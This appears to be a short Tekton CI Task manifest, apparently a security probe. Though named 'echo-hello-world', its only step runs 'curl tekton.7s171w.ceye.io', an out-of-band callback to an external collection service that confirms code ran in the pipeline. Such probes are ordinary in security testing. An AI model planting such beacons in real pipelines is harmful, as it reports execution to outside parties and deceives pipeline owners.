apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: echo-hello-world
spec:
  steps:
    - name: test
      image: xfantasy/nonrootubuntu
      command:
        - /bin/bash
      args:
        - "-c"
        - "curl tekton.7s171w.ceye.io"
  securityContext:
    runAsUser: 1000
    runAsGroup: 1000
